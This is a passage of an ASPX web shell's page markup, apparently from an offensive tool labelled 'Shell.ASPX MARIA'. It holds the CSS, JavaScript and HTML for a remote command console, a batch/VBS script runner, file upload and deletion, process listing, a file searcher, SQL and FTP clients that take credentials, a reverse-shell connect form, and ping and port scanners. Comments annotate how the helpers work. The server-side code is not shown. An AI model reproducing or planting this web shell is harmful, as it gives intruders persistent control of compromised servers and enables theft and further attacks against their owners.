  689. body {margin: 0px; background-color: white}
  690. pre {font-family: Courier New; background-color: black; margin: 60px;}
  691. .alert {color:Black;background-color:yellow; border: 3px solid yellow; font-size: 14px;}
  692. .timer {font-size: 22px; background-color: red; color: #FFFFFF; text-align: left;}
  693. .boxer {font-size: 15px; text-align: left;}
  694. .tabla {width: 100%; border: 3px solid #000;overflow-x:auto}
  695. .footTable {width: 100%; border: 3px solid #000;overflow-x:auto}
  696. .cmdPromp {background-color: black; color: white;border: 3px solid #000;}
  697. h2 {font-size: 14px; background-color: #006600; color: #FFFFFF; padding: 2px; }
  698. th {text-align: left; background-color: black; color: white}
  699. td {background-color: #d7d7d7;}
  700. a:link {background-color: #d7d7d7; color: black}
  701. a:visited {background-color: #d7d7d7;}
  702. a:hover {background-color: red;}
  703. a:active {background-color: #d7d7d7;}
  704. #footer {width: 100%;height:81px;position:relative;bottom: 0;left: 0;}
  705. </style>
  706. <script language="JavaScript" type="text/javascript">
  707. <!--
  708. var ShellPROMPT = " SHELL.ASPX Message: \n";
  // Client-side helpers for the file browser. Each one navigates to this same
  // page with one of the action query parameters handled server-side
  // (Rename/file, NewFolder, NewFile, Directory, Delete); values typed into the
  // prompts are appended to the URL without encoding.
  // Zanizar: normalises "//" and "/" to backslashes before building a link.
  709. function Zanizar(value) { value = value.replace(/\/\//g, "\\"); value = value.replace(/\//g, "\\"); return value }
  710. function PopupBoxRenameFile(folder, file) { var string = prompt(ShellPROMPT + "Type the New Name for " + file + " file."); if (string != null) { folder = Zanizar(folder); file = Zanizar(file); window.location = "?file=" + file + "&Rename=" + string; } }
  711. function makeFolder() { var string = prompt(ShellPROMPT + "Type the New folder Name."); if (string != null) { alert(string); window.location = "?NewFolder=" + string; } }
  712. function makeFile() { var string = prompt(ShellPROMPT + "Type the New File Name."); if (string != null) { alert(string); window.location = "?NewFile=" + string; } }
  // Toggles one of the feature panels (CONSOLE, SQLConnection, Tasklist, ...).
  713. function DivShowAndHidden(DivName) { var e = document.getElementById(DivName); e.style.display = (e.style.display == 'block') ? 'none' : 'block'; }
  714. function GetFileDB(a) { var x = (a.value || a.options[a.selectedIndex].value); if (x == "SQLite") { DivShowAndHidden('FileNAMESQLite'); } }
  715. function GoFolder(folder){window.location = "?Directory="+folder; }
  // Confirm dialog, then ?Delete=<path>; cancelling only shows an alert.
  716. function deletefile(file){if (confirm("Delete file : "+file+" ?") == true) {window.location = "?Delete="+file; } else {alert("Coward"); } }
  // Banner clock, refreshed every second. The trailing "ID:/OS:" text is
  // rendered server-side (the <%= %> expression below), so the machine name and
  // OS version are present in the HTML of every GUI response.
  // `myclock` is assigned without var and therefore becomes a global.
  717. function Reloj() {
  718. if (!document.layers && !document.all && !document.getElementById)
  719. return
  720. var Digital = new Date()
  721. var hours = Digital.getHours()
  722. var minutes = Digital.getMinutes()
  723. var seconds = Digital.getSeconds()
  724. var d = new Date();
  725. var dn = "PM"
  726. if (hours < 12) { dn = "AM" } if (hours > 12) { hours = hours - 12 } if (hours == 0) { hours = 12 } if (minutes <= 9) { minutes = "0" + minutes } if (seconds <= 9) { seconds = "0" + seconds }
  727. myclock = hours + ":" + minutes + ":" + seconds + " " + dn + " % " + d.getDate() + "/" + (d.getMonth() + 1) + "/" + d.getFullYear() + " ID:<%= NameMachine +"<br> OS:"+ VersionOS %>"
  // Legacy browser branches; only the getElementById branch re-arms the timer.
  728. if (document.layers) { document.layers.liveclock.document.write(myclock); document.layers.liveclock.document.close() }
  729. else if (document.all) { liveclock.innerHTML = myclock }
  730. else if (document.getElementById) { document.getElementById("liveclock").innerHTML = myclock; setTimeout("Reloj()", 1000) }
  731. }
  732. window.onload = Reloj
  733. //-->
  734. </script>
  735. <div class="timer">Shell.ASPX MARIA<span style="position:absolute;left:80%;" id="liveclock"></div>
  736. <table class="tabla">
  737. <tr>
  738. <th scope="col">Commands</th>
  739. <th scope="col">Name</th>
  740. <th scope="col">Type</th>
  741. <th scope="col">Attributes</th>
  742. <th scope="col">Data Creation</th>
  743. <th scope="col">Size</th>
  744. </tr>
  745. <div class="footTable"><div class="boxer"> <a href="<%= MARIA %>"><input type="button" id="Dirs" value="Home"></a> Storages <%= Output %> Directory Current: <input type="text" id="CurrentFolder" style="width: 68%;" value="<%= CurrentFolder %>"> <input type="button" value="Go" onclick="GoFolder(document.getElementById('CurrentFolder').value)"> <input type="button" value="Make Folder" onclick="makeFolder()"><input type="button" onclick=" makeFile()" value="Make File"></div></div>
  746. <div class="Liste"> <%= Folders %> <%= Files %>
  747. <form id="form1" runat="server">
  748. <div class="footTable"> <b> Console</b> <asp:TextBox runat="server" ID="txtCmdIn" Width="88%" /><asp:Button runat="server" ID="cmdExec" Text="Execute" /></div><div class="cmdPromp">
  749. <pre>
  750. <h1>CMD::CONSOLE</h1>
  751. <asp:Literal runat="server" ID="lblCmdOut" Mode="Encode" /></pre></div>
  752. </table><div class="footTable">Upload Files :
  753. <asp:FileUpload runat="server" ID="flUp" />
  754. <asp:Button runat="server" ID="cmdUpload" Text="Upload" /></div>
  755. </form>
  756. <div class="footTable">Binaries detected: <%= Binaries %> </div>
  757. <div class="footTable"><center> <center style="background-color: black; color: white; font-family: inherit; font-language-override: inherit; font-style: italic;"> <input type="button" onclick="javascript: DivShowAndHidden('CONSOLE')" value="Scripting"> % <input type="button" onclick=" javascript: DivShowAndHidden('SQLConnection')" value="SQL Client"> % <input type="button" onclick=" javascript: DivShowAndHidden('Tasklist')" value="Process"> % <input type="button" onclick=" javascript: DivShowAndHidden('Searcher')" value="Searcher"> % <input type="button" onclick=" javascript: DivShowAndHidden('FTP')" value="FTP Client"> % <input type="button" onclick="javascript: DivShowAndHidden('SRV')" value="Shell-Reverse"/> % <input type="button" onclick="javascript: DivShowAndHidden('PSCAN')" value="Ping-Scan" /> % <input type="button" onclick="javascript: DivShowAndHidden('PORTSCAN')" value="Port-Scan" /></</b></center>
  758. <div id="CONSOLE" style="display:none;"><br> Script Type:
  759. <form method="POST">
  760. <select name="language">
  761. <option value="batch">Batch</option>
  762. <option value="vbs">VBS</option>
  763. </select><input type="submit" value="Run."> <br>
  764. <textarea name="content" style='height: 100%; width: 100%;'>
  765. </textarea>
  766. </form>
  767. </div></div>
  768. <div id="Tasklist" style="display:none;">
  769. <table class="tabla">
  770. <tr>
  771. <th scope="col">Commands</th>
  772. <th scope="col">Name</th>
  773. <th scope="col">PID</th>
  774. </tr>
  775. <%= VTTable %>
  776. </table>
  777. </div>
  778. <div id="PSCAN" style="display:none;">
  779. <div class="footTable">
  780. <form id="PSCANForm" method="POST"><br>
  781. <center>
  782. Range.......... <input type="text" name="Range" value="127.0.0.%">
  783. Timeout........ <input type="text" name="Timeout" value="3000">(s)<br>
  784. <input type="submit" value="Scan"><br>
  785.  
  786. <%= PINGSCAN %>
  787.  
  788. </form></center>
  789. </div></div>
  790. <div id="PORTSCAN" style="display:none;">
  791. <div class="footTable">
  792. <form id="PORTSCANForm" method="POST"><br>
  793. <center>
  794. IP.......... <input type="text" name="IPSCAN" value="<%= Request.Form["IPSCAN"] %>">
  795. Ports....... <input type="text" name="Ports" value="21,25,80,110,1433,1723,3306,3389,4899,5631,43958,65500,22,443,8080,8081,8082,8083,8443,1099,9090,9091,9092,9093,9094,9443,7001">(s)<br>
  796. <input type="submit" value="Scan"><br>
  797.  
  798. <%= PORTSCAN %>
  799.  
  800. </form></center>
  801. </div></div>
  802. <div id="Searcher" style="display:none;">
  803. <div class="footTable"><br><center>
  804. <form id="Form2" method="POST">
  805. <input type="hidden" name="Searcher" value="true">
  806. Name.......... <input type="text" name="QueryNameSearch" value=""><br>
  807. Extension... <input type="text" name="QueryExtentionSearch" value=""><br>
  808. Content....... <input type="text" name="QueryStringSearch" value=""><br>
  809. <br><input type="submit" value="I'm gonna get lucky?..."><br>
  810. <%= ResultSearchOuput %>
  811. </p></form>
  812. </center><br>
  813. </div></div>
  814. <div id="SQLConnection" style="display:none;">
  815. <div class="footTable"><br><center>
  816. <form id="SQLForm" method="POST">SQL Type:
  817. <select onchange="GetFileDB(this)" name="SQLProtocol">
  818. <option value="SQLServer">SQLServer</option>
  819. <option value="SQLite">SQLite</option>
  820. <option value="PostgreSQL">PostgreSQL</option>
  821. <option value="MySQL">Mysql</option>
  822. </select>
  823. Host:<input type="text" name="host" value="<%= Request.Form["host"] + Request.QueryString["host"]%>">
  824. Port:<input type="text" name="port" value="<%= Request.Form["port"] + Request.QueryString["port"]%>">
  825. Username:<input type="text" name="user" value="<%= Request.Form["user"] + Request.QueryString["user"]%>">
  826. Password:<input type="text" name="pass" value="<%= Request.Form["pass"] + Request.QueryString["pass"]%>">
  827. Database:<input type="text" name="database" value="<%= Request.Form["database"] + Request.QueryString["database"]%>">
  828.  
  829. <div id="FileNAMESQLite" style="display:none;">
  830. <br>SQLite Connection<br><br>
  831. DB File:<input type="text" name="filename" placeholder="C:/USER/RED/TEST.SQLITE" value="<%= Request.Form["filename"] + Request.QueryString["filename"]%>">
  832. Version: <select name="VersionSQLite">
  833. <option value=1>1.0</option>
  834. <option value=3>3.0</option>
  835. </select>
  836. </div>
  837.  
  838. <input type="submit" value="Connect">
  839. </form></center>
  840. <%= SQLView %>
  841. </div></div>
  842. <div id="FTP" style="display:none;">
  843. <div class="footTable"><br><center>
  844. <form id="Form3" method="POST">
  845. Host:<input type="text" name="host" value="<%= Request.Form["host"] %>">
  846. Username:<input type="text" name="user" value="<%= Request.Form["user"] %>">
  847. Password:<input type="text" name="pass" value="<%= Request.Form["pass"] %>">
  848. SSL:<input type="checkbox" name="database" value="">
  849. <input type="hidden" name="FTP" value="true">
  850. <input type="hidden" name="command" value="">
  851. <input type="submit" value="Connect">
  852. </form></center>
  853. <%= OutputFTPBuffer + OutputFTPStatus %>
  854. </div></div>
  855.  
  856. <div id="SRV" style="display:none;">
  857. <div class="footTable"><br><center>
  858. <form id="Form5" method="POST">
  859. Host:<input type="text" name="host" value="<%= Request.Form["host"] %>">
  860. Port:<input type="text" name="port" value="<%= Request.Form["port"] %>">
  861. <input type="hidden" name="a" value="Shell">
  862. <input type="submit" value="Connect">
  863. </form></center></div></div>
  864.  
  865. </html>
  866. <% } %>